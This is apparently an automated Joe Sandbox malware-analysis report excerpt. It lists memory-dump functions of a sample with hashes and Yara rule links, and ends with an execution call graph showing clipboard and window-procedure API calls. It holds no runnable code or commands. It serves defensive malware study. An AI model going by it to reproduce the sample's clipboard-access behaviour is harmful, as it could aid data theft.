                                • Opcode Fuzzy Hash: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                                • Instruction Fuzzy Hash: 0601B675D00609DFCB40EFACC54589DBBF4FF49210B1185AAE859EB321E770AA44CF91
                                Function 055C47D0 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a0fe1a46587fe4fe0e86058d22ab49f8ac69a19b431de735b6add39dc807ea1d
                                • Instruction ID: cb55dc19075ad9c347840729575eba8f3b4c7fcbb8d885173e14099babcdfb1e
                                • Opcode Fuzzy Hash: a0fe1a46587fe4fe0e86058d22ab49f8ac69a19b431de735b6add39dc807ea1d
                                • Instruction Fuzzy Hash: 67F0F8716147448FAF28CF58D4929A57BE6FB08359730099EE41ACF302D772E8038B84
                                Function 055C1D30 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 30a0d1e82435c14acaaac90a18d61fc1b4ffa3dab6ebf28a533824eb556af8ec
                                • Instruction ID: 2cd0f6653a16dac0aaa0b2aafef02638f8ebde60f6f0c05edcb6aeb8b5aaf4ba
                                • Opcode Fuzzy Hash: 30a0d1e82435c14acaaac90a18d61fc1b4ffa3dab6ebf28a533824eb556af8ec
                                • Instruction Fuzzy Hash: C1F0E530209345CFC316EB7584548267BE1FF5A30175588FFD05A8B262CA35DC81CB91
                                Function 055CAC90 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4598f041a7e61c5b87cd25447a28962e4edda0c35f49dfc2867608f9cbd38bcf
                                • Instruction ID: e1fbfb7a311c9f2ea67180ac3190d8df6c062382cd20161280bf7bdae58e2294
                                • Opcode Fuzzy Hash: 4598f041a7e61c5b87cd25447a28962e4edda0c35f49dfc2867608f9cbd38bcf
                                • Instruction Fuzzy Hash: BBE0ED71B006254B8758EBAFA40086AB7DBEFE8510358C57FD90E87729ED71984686C4
                                Function 055CA6CC Relevance: .0, Instructions: 28COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 84e398f84a132cb0b880889632f1b4cddfbfdb8f46a8a929cbd966175aef1536
                                • Instruction ID: 5a8e357391c5b422dec80847f81d9dc178c63b2a8d692872569be564bb3cbdc8
                                • Opcode Fuzzy Hash: 84e398f84a132cb0b880889632f1b4cddfbfdb8f46a8a929cbd966175aef1536
                                • Instruction Fuzzy Hash: AAE0DF3130A3084FC728A6F4E4403627FABFF81355B0008BED10EC2204CE32D840C291
                                Function 055C0AA8 Relevance: .0, Instructions: 28COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 48bf4c20cd4cb83b371352c7897177ac45a5d919c55728015addd26a32451413
                                • Instruction ID: c8c807e409f5ed68fda246b16a94f40e2c9d32dc72c0f87b7755c8a19fca100f
                                • Opcode Fuzzy Hash: 48bf4c20cd4cb83b371352c7897177ac45a5d919c55728015addd26a32451413
                                • Instruction Fuzzy Hash: 43F0E536B00159EFCF45ABD4C4008FEBBB7BFC8211B14414AE665E72A1CA358A129B92
                                Function 055CE140 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 326531ac712fb6ba27e9d0695745a3602a7c33b1747316a66c675644e6152c5f
                                • Instruction ID: cae64e9275e0b9a16487514a4e67a1effa13e5842425ac580985d045b8aad621
                                • Opcode Fuzzy Hash: 326531ac712fb6ba27e9d0695745a3602a7c33b1747316a66c675644e6152c5f
                                • Instruction Fuzzy Hash: E2E09A30348B504FC71B9A58E8148697BF9AB8A32031846EAE449CB3A2DA60DC468798
                                Function 055CAC80 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b765a934290eb11c5ec99a35e6dd0e7e64eef07906b43e9fd4eb023b9a8a0836
                                • Instruction ID: e1eddb39aa0c73fd665455076a0e5c8d872120fff4dd7f810771a341bc94f5a9
                                • Opcode Fuzzy Hash: b765a934290eb11c5ec99a35e6dd0e7e64eef07906b43e9fd4eb023b9a8a0836
                                • Instruction Fuzzy Hash: AFE0D8746047040F9714A677D4008767FEAFEE960030CC1AFE80987216D9715D428791
                                Function 055CAF71 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cd93aee3151975575e96a04f462c95e3f511725a1786b4243fade8c0d5b3f19b
                                • Instruction ID: b928c25e2907b36f970f7bd4c411a58ccdc3e5772589ffaf4d2646ef6c19dc14
                                • Opcode Fuzzy Hash: cd93aee3151975575e96a04f462c95e3f511725a1786b4243fade8c0d5b3f19b
                                • Instruction Fuzzy Hash: A0F06D7570A3854FCB2A5BB4E5107617FA6AF82255B0804EED549CB256CA718880C792
                                Function 055C47C2 Relevance: .0, Instructions: 26COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b2668399693400b9200d799c90267ab5f7b4d7069caa0b894757d774ca48aa52
                                • Instruction ID: e7805641d77a37e3afd8372b3bf42ad0af4ff59fa0455bddba46bb0f142d826d
                                • Opcode Fuzzy Hash: b2668399693400b9200d799c90267ab5f7b4d7069caa0b894757d774ca48aa52
                                • Instruction Fuzzy Hash: CBE09A31608240CFCF18DF88E892AA57BE2FB44319B2408AEE406CF641D762D8028B88
                                Function 055C4690 Relevance: .0, Instructions: 25COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e51dd4399c5e978dd37dfb355747266be35ae9e400f9c12798abf012daf6a4bc
                                • Instruction ID: dfd84d52f986781c5336373207ccb46c176c9c05696b0592c090acdfe3472936
                                • Opcode Fuzzy Hash: e51dd4399c5e978dd37dfb355747266be35ae9e400f9c12798abf012daf6a4bc
                                • Instruction Fuzzy Hash: 5BE0DF317482100FC30A275898617C67BE99F8A250F0A84BBE909CF393C9658C0043A9
                                Function 055C8859 Relevance: .0, Instructions: 24COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2a7a2d82c80383c00b41a9fa62202cbdb16446ef7c8e165b1297cbea6658f2aa
                                • Instruction ID: 57d3e36e7f929e3811f0865a7936fe437037d22e52eae1cf68a3c517a45b33c3
                                • Opcode Fuzzy Hash: 2a7a2d82c80383c00b41a9fa62202cbdb16446ef7c8e165b1297cbea6658f2aa
                                • Instruction Fuzzy Hash: CDE09231245649AFCB02CFA1EC09EA63FB9BF55220F0584D6F5449B532D231D911DB61
                                Function 055C175E Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f8c1fe69941a00e04125d3f2e500cf9eb0408e6a722e826940b72e0bc52867a8
                                • Instruction ID: 381a67bc5f79535e3775b4bba1e4474a135ce8f7cd5003bcfc6b5d3f967a90db
                                • Opcode Fuzzy Hash: f8c1fe69941a00e04125d3f2e500cf9eb0408e6a722e826940b72e0bc52867a8
                                • Instruction Fuzzy Hash: 32E01A75A5011DDECB10ABD1E5087EDBFB1FB45756F20049AE116B2951C7350584CB90
                                Function 055C2819 Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 80ac8790cf00a12a23eb91261954dff9fef1764c65a87d4a9f2161e045189779
                                • Instruction ID: 9b09bf69ae217df028b57b53f37309fb635057b4edf5c41e5fd7e30305c431a2
                                • Opcode Fuzzy Hash: 80ac8790cf00a12a23eb91261954dff9fef1764c65a87d4a9f2161e045189779
                                • Instruction Fuzzy Hash: F3E02636601314CFC314EFA5D040A9277E5FF55310B1080BEC80D87360CA36EC82CB80
                                Function 055CA8DC Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4ad848c6d1ba2d65511c75c6120ed6fa5e7bfa3872032739bcbbbcfc9946424c
                                • Instruction ID: b8fae54d7ab2b8853f3abba704e43dc3ec92eed095c87d21bf0e79d341ab7a9f
                                • Opcode Fuzzy Hash: 4ad848c6d1ba2d65511c75c6120ed6fa5e7bfa3872032739bcbbbcfc9946424c
                                • Instruction Fuzzy Hash: F7E08C303547009F8328DA5CE88095A77EABF883103508EA9F00AC7320CA61EC054789
                                Function 055C27C8 Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 23c39ec68f9bdedaa2ec4a64cb3a1a977e2dff0b5b02f963ac4988239f613a9f
                                • Instruction ID: 3d829e9e49fdd84a133c44495731c3d35274ce29fcb68d852dbe55d32c802bf9
                                • Opcode Fuzzy Hash: 23c39ec68f9bdedaa2ec4a64cb3a1a977e2dff0b5b02f963ac4988239f613a9f
                                • Instruction Fuzzy Hash: 80E026357097C51BD301F3A4A82175E37AAAB85211F50046BC900CB241CA249C84C3D2
                                Function 055C0730 Relevance: .0, Instructions: 21COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ea3a47c534e1819f80ce28fdf89fba86bd89a17bf633b667a7f92787483ca6b6
                                • Instruction ID: 60f660fd77d94c970a4e34336706b52954519d84c1d0ae02f56e12d34d8fc098
                                • Opcode Fuzzy Hash: ea3a47c534e1819f80ce28fdf89fba86bd89a17bf633b667a7f92787483ca6b6
                                • Instruction Fuzzy Hash: 99E06D71905249EBDB00EFA4EA215DE3BB1FB49210B20459AD809E7305D7365E04DB00
                                Function 055C8E50 Relevance: .0, Instructions: 20COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b02401b39fa6ae357a5a468c66b65cc22e7998703ee4bc612e561316a8c1972f
                                • Instruction ID: 314c92d676c3fb3d119c51b461d3acfc94d3afd9590d530f4660f77c73ca499d
                                • Opcode Fuzzy Hash: b02401b39fa6ae357a5a468c66b65cc22e7998703ee4bc612e561316a8c1972f
                                • Instruction Fuzzy Hash: F9D0A7323002288F8B1476F6780856D3FCDFB8576530000BEF50EC3700DE21884043C5
                                Function 055C4B00 Relevance: .0, Instructions: 20COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6fb04f0f9260cec8ffbfeb7df8d21a3261c998de0a66a3002aa74b84d67fe5f6
                                • Instruction ID: 0ee6c5f77cb35ce93a247a6d5851661c76dd486bbd68ad968b32ea73e3b9cf0d
                                • Opcode Fuzzy Hash: 6fb04f0f9260cec8ffbfeb7df8d21a3261c998de0a66a3002aa74b84d67fe5f6
                                • Instruction Fuzzy Hash: 0AE0C237504182DFCF0297D4EC02B88BFA0FF92722F4685E6D1808B160D6268138D792
                                Function 055CB4A1 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cfca43f32729c4af11d7478c28df830012e026154c20044f15a04568d28bd5bc
                                • Instruction ID: 670b89a9567b19ba89accae2d088497a6f42cb8f469d16b27ee3ee6d35163450
                                • Opcode Fuzzy Hash: cfca43f32729c4af11d7478c28df830012e026154c20044f15a04568d28bd5bc
                                • Instruction Fuzzy Hash: 91D02B373001107FCB046B28E406E9A3BE8DB1F310B148066F508C3311CE21DC015690
                                Function 055C0740 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1f87ed6f46e36cdfcf260930225041f49d1d7a71ca6c9d41a6cbde3858bb7dc9
                                • Instruction ID: c48374f5fe04fccfa7fa7088b5d0d92c0e9812237e5fde48c88da4d63db6cae8
                                • Opcode Fuzzy Hash: 1f87ed6f46e36cdfcf260930225041f49d1d7a71ca6c9d41a6cbde3858bb7dc9
                                • Instruction Fuzzy Hash: BFE0EC71A0120DEFDB00EFA4E95186D7BFAFB58614B20859ED809E3314EB726E14EB51
                                Function 055C8A33 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 065f7c4d5be2027b65ac110ef62fbc04824e3dc6a8f57459729aa3a63af4bca3
                                • Instruction ID: a2e8649661537b01487a20c7586a63ed013cdd08873c6f10c8bb882ea128bcbb
                                • Opcode Fuzzy Hash: 065f7c4d5be2027b65ac110ef62fbc04824e3dc6a8f57459729aa3a63af4bca3
                                • Instruction Fuzzy Hash: DBE0123AA4100DAFCF00CFC0E940BDEBB32FB88315F208019FA012A290C7326A21DB91
                                Function 055C46A0 Relevance: .0, Instructions: 18COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5ae1a5ba572bc9d0c73e0f77ab6ac1d8110e536a79176fa69114ac096c50acd0
                                • Instruction ID: 379db27631d03471ba7d47df2a9fc1c9f19bcb71d78b35f4a5cf1fc4e0a99b1c
                                • Opcode Fuzzy Hash: 5ae1a5ba572bc9d0c73e0f77ab6ac1d8110e536a79176fa69114ac096c50acd0
                                • Instruction Fuzzy Hash: 4DD05E317046140BC7096659901079AB6DA9FC9751F05C4BFE50A8B392C9B19C0002E5
                                Function 055C8E41 Relevance: .0, Instructions: 18COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c6339485bedba07878a9e9d280d7ddae8d990a5e35397f0839b1bcbace9d60d1
                                • Instruction ID: 76b78b4a0a38a70b5ec1eca51f9045b0f2143967bc9ed10ff0931a429c6838ac
                                • Opcode Fuzzy Hash: c6339485bedba07878a9e9d280d7ddae8d990a5e35397f0839b1bcbace9d60d1
                                • Instruction Fuzzy Hash: FBD012B7B144151BDB5014E9B942BF62FC8B74BB71F4904AEE50CC2200F558C4420681
                                Function 055CB4B0 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 997a6f16d8bed8da8483b4628bf28d3cd960fb4b02ba02a22bd842901ef56e30
                                • Instruction ID: 8c6232d7ca7aff730b55e7a004c6619ad6bbee5d3985f216b69d78e99b036038
                                • Opcode Fuzzy Hash: 997a6f16d8bed8da8483b4628bf28d3cd960fb4b02ba02a22bd842901ef56e30
                                • Instruction Fuzzy Hash: 87D0C93A310124AF8704AB68E408CA97FE9EB4D6613158066F909C7321CE72DC119BD4
                                Function 055C2020 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a634a98b945aefd0a41ae3507fa7a76b750b094519424c5c693d1d24066d3c58
                                • Instruction ID: 369f1a8cf7a5cfddb3f3c53939d8df85ca51fc0089a3459eb5389cf7aefc4a95
                                • Opcode Fuzzy Hash: a634a98b945aefd0a41ae3507fa7a76b750b094519424c5c693d1d24066d3c58
                                • Instruction Fuzzy Hash: 12B09B3131563517D50431DD642469E769E47C5B60F40406B960D877424DC59C4102E9
                                Function 055C8F61 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 15233e458f974485cd9dda7ddf320d5fef316d79729f2e8efcbb07408f7950b2
                                • Instruction ID: eb38a2136279c6297a687552cf8c719900fdf73e881983ecd3e5c6bc5d1f7318
                                • Opcode Fuzzy Hash: 15233e458f974485cd9dda7ddf320d5fef316d79729f2e8efcbb07408f7950b2
                                • Instruction Fuzzy Hash: 4FC0120D30DBC20EEB13A6B00C98A712EAB2AC3300F8980CE9480850A39068888A8722
                                Function 055C8868 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
                                • Instruction ID: 103967bf13f508402a192ef6221732069224ae084a114efb1bafc53f37aadea3
                                • Opcode Fuzzy Hash: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
                                • Instruction Fuzzy Hash: BCD0C93614010CEFCB01CF95D844D9A3BBAFF48720F008054FA084B232C332E821EB90
                                Function 055C34C0 Relevance: .0, Instructions: 9COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ec24d64894e5ae284e638b142351f48792eb7552004802f228a52af462c7bd7f
                                • Instruction ID: 3748cc999081365b32b72c4fe9f0fa1c42623fab1e8201ce5acfbd085e5fc9d7
                                • Opcode Fuzzy Hash: ec24d64894e5ae284e638b142351f48792eb7552004802f228a52af462c7bd7f
                                • Instruction Fuzzy Hash: 60C04C39254105EF9B41AB90D998D597BA5FF95305B41DCD5614546020CA36C418E712
                                Function 055C8DE8 Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0eed207713146462f905683fc514a2e9e83f393ce9692d493e296ee49461ae50
                                • Instruction ID: d963871f999922be2078ef17e19e3f60ccbfeecff0c234b898d625d75fb16a3e
                                • Opcode Fuzzy Hash: 0eed207713146462f905683fc514a2e9e83f393ce9692d493e296ee49461ae50
                                • Instruction Fuzzy Hash: 1BB01238204501076A04F1F21CC412605277ED07013C4CC9810010000448345042202A
                                Function 055C8A2A Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8fc304a26ba6a9b8e09db51e88682a954301326f375d2764bec1dfa900b44145
                                • Instruction ID: 44325f88c0735b381380062a5feff2017e51146eae13a71bf66922ca7796926e
                                • Opcode Fuzzy Hash: 8fc304a26ba6a9b8e09db51e88682a954301326f375d2764bec1dfa900b44145
                                • Instruction Fuzzy Hash: D1B09237A0400889DB108AC5B8413EEFB20F780335F104467C21652541837201A496D1

                                Execution Graph

                                Execution Coverage:13.2%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:323
                                Total number of Limit Nodes:24
                                execution_graph 44054 314d030 44055 314d048 44054->44055 44056 314d0a2 44055->44056 44061 6f360e2 44055->44061 44065 6f33904 44055->44065 44073 6f360f0 44055->44073 44077 6f3aa12 44055->44077 44062 6f360f0 44061->44062 44063 6f33904 2 API calls 44062->44063 44064 6f36137 44063->44064 44064->44056 44066 6f3390f 44065->44066 44067 6f3aaa1 44066->44067 44069 6f3aa91 44066->44069 44070 6f3aa9f 44067->44070 44097 6f39a14 44067->44097 44085 6f3abc8 44069->44085 44091 6f3abb8 44069->44091 44074 6f36116 44073->44074 44075 6f33904 2 API calls 44074->44075 44076 6f36137 44075->44076 44076->44056 44080 6f3aa1a 44077->44080 44078 6f3aaa1 44079 6f39a14 2 API calls 44078->44079 44082 6f3aa9f 44078->44082 44079->44082 44080->44078 44081 6f3aa91 44080->44081 44083 6f3abc8 2 API calls 44081->44083 44084 6f3abb8 2 API calls 44081->44084 44083->44082 44084->44082 44087 6f3abce 44085->44087 44086 6f39a14 2 API calls 44086->44087 44087->44086 44088 6f3acae 44087->44088 44104 6f3b0a0 44087->44104 44109 6f3b090 44087->44109 44088->44070 44093 6f3abce 44091->44093 44092 6f39a14 2 API calls 44092->44093 44093->44092 44094 6f3acae 44093->44094 44095 6f3b0a0 OleGetClipboard 44093->44095 44096 6f3b090 OleGetClipboard 44093->44096 44094->44070 44095->44093 44096->44093 44098 6f39a1f 44097->44098 44099 6f3adb4 44098->44099 44100 6f3ad0a 44098->44100 44101 6f33904 OleGetClipboard 44099->44101 44102 6f3ad62 CallWindowProcW 44100->44102 44103 6f3ad11 44100->44103 44101->44103 44102->44103 44103->44070 44105 6f3b0bf 44104->44105 44106 6f3b116 44105->44106 44114 6f3b647 44105->44114 44120 6f3b658 44105->44120 44106->44087 44110 6f3b096 44109->44110 44111 6f3b086 44110->44111 44112 6f3b647 OleGetClipboard 44110->44112 44113 6f3b658 OleGetClipboard 44110->44113 44111->44087 44112->44110 44113->44110 44116 6f3b652 44114->44116 44115 6f3b674 44115->44105 44116->44115 44126 6f3b692 44116->44126 44137 6f3b6a0 44116->44137 44117 6f3b689 44117->44105 44122 6f3b659 44120->44122 44121 6f3b674 44121->44105 44122->44121 44124 6f3b692 OleGetClipboard 44122->44124 44125 6f3b6a0 OleGetClipboard 44122->44125 44123 6f3b689 44123->44105 44124->44123 44125->44123 44127 6f3b69a 44126->44127 44128 6f3b6cd 44127->44128 44130 6f3b711 44127->44130 44133 6f3b692 OleGetClipboard 44128->44133 44134 6f3b6a0 OleGetClipboard 44128->44134 44129 6f3b6d3 44129->44117 44132 6f3b791 44130->44132 44148 6f3b968 44130->44148 44152 6f3b958 44130->44152 44131 6f3b7af 44131->44117 44132->44117 44133->44129 44134->44129 44138 6f3b6b2 44137->44138 44139 6f3b6cd 44138->44139 44141 6f3b711 44138->44141 44146 6f3b692 OleGetClipboard 44139->44146 44147 6f3b6a0 OleGetClipboard 